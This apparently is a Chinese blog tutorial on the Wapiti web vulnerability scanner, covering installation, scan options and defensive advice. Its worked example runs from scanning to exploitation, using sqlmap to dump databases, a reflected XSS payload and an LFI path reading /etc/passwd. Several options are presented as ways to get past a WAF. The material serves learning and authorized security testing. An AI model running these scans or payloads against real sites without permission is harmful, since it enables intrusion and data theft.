Wapiti 渗透神器：一键扫描网站漏洞，精准定位安全风险！

想要快速检测网站安全漏洞，找出潜在风险
强大安全扫描工具——Wapiti，自动化检测 SQL 注入、XSS、LFI 等漏洞！

1. 什么是 Wapiti

Wapiti 是一款强大的 Web 漏洞扫描工具，可自动化检测网站的各种安全漏洞，包括：

✅ SQL 注入（SQLi）
✅ 跨站脚本（XSS）
✅ 远程/本地文件包含（RFI/LFI）
✅ 命令注入（Command Injection）
✅ 不安全的 .htaccess 配置
✅ 敏感文件泄露（备份、日志等）
✅ 可绕过 WAF（Web 应用防火墙）

安装 Wapiti

# Debian / Ubuntu / Kali Linux
sudo apt install wapiti -y

# macOS
brew install wapiti

# 源码安装
git clone https://github.com/wapiti-scanner/wapiti.git
cd wapiti
pip install -r requirements.txt
python3 wapiti.py -h

查看 Wapiti 版本

wapiti -v

查看 Wapiti 帮助

wapiti -h

2. Wapiti 基础命令

扫描目标网站

wapiti -u http://target.com

默认进行全方位漏洞扫描

指定扫描的 HTTP 方法

wapiti -u http://target.com --methods GET,POST

可选择 GET、POST、PUT、DELETE 进行深度测试

排除特定 URL

wapiti -u http://target.com -x logout.php

避免扫描 logout.php，防止自动退出账户

指定扫描模块

wapiti -u http://target.com --module sql,xss

仅扫描 SQL 注入和 XSS 漏洞，提高效率

启用 Cookie 认证

wapiti -u http://target.com --cookie "PHPSESSID=123456"

适用于测试需登录的网站后台

使用代理绕过防火墙

wapiti -u http://target.com --proxy http://127.0.0.1:8080

搭配 Burp Suite 进行流量分析

保存扫描结果

wapiti -u http://target.com -o report.html

支持 txt、json、xml、html 等格式，方便分析

⚡ 3. Wapiti 进阶玩法

设置扫描深度

wapiti -u http://target.com --max-depth 3

控制爬虫深入网站的层级，避免陷入死循环

测试 HTTP 头部注入

wapiti -u http://target.com --module header

检查网站是否存在 Host 伪造、CORS 配置错误

强制忽略 SSL 证书错误

wapiti -u https://target.com --verify-ssl 0

适用于测试自签名 SSL 证书的网站

绕过 WAF 防火墙

wapiti -u http://target.com --scan-force 3

调整扫描力度，避免触发安全拦截

暴力测试目录

wapiti -u http://target.com --bruteforce

查找隐藏目录（如 /admin/、/backup/）

 4. 实战案例：从扫描到漏洞利用

目标站点：http://vulnerable.com
我们要使用 Wapiti 扫描漏洞，并手动利用高危漏洞！

第一步：扫描 SQL 注入

wapiti -u http://vulnerable.com --module sql

扫描结果：

• • 发现 GET /product.php?id=1 存在 SQL 注入
• • 漏洞级别：高危
• • 建议利用工具：sqlmap

第二步：使用 SQLMap 进一步攻击

sqlmap -u "http://vulnerable.com/product.php?id=1" --dbs

成功获取数据库信息！ ?

第三步：扫描 XSS

wapiti -u http://vulnerable.com --module xss

扫描结果：

• • 发现 search.php?q=<script>alert(1)</script> 存在 反射型 XSS
• • 漏洞级别：中危
• • 建议测试手工注入

手动验证 XSS
访问：

http://vulnerable.com/search.php?q=<script>alert(1)</script>

如果弹出 alert(1)，说明网站存在 XSS 漏洞！

第四步：文件包含漏洞（LFI）

wapiti -u http://vulnerable.com --module file

 扫描结果：

• • 发现 download.php?file=../../etc/passwd 可能存在 LFI
• • 漏洞级别：高危
• • 建议手工测试

手工验证 LFI
访问：

http://vulnerable.com/download.php?file=../../etc/passwd

如果返回 Linux 用户信息，说明存在 LFI 漏洞！ ?

 5. 如何防御 Wapiti 扫描

✅ 使用 WAF（Web 应用防火墙）拦截恶意扫描
✅ 屏蔽 User-Agent，限制扫描工具访问
✅ 检测异常流量，限制同一 IP 短时间访问频率
✅ 定期升级 Web 应用，修复已知漏洞
✅ 主动使用 Wapiti 进行自查，提前修复问题

6. 总结

 Wapiti 是强大的 Web 漏洞扫描工具，支持 SQL 注入、XSS、LFI 等自动检测！
配合 SQLMap、Burp Suite、Metasploit，能实现更深入的渗透测试！
防守方必须学会使用，定期自查，避免网站被黑！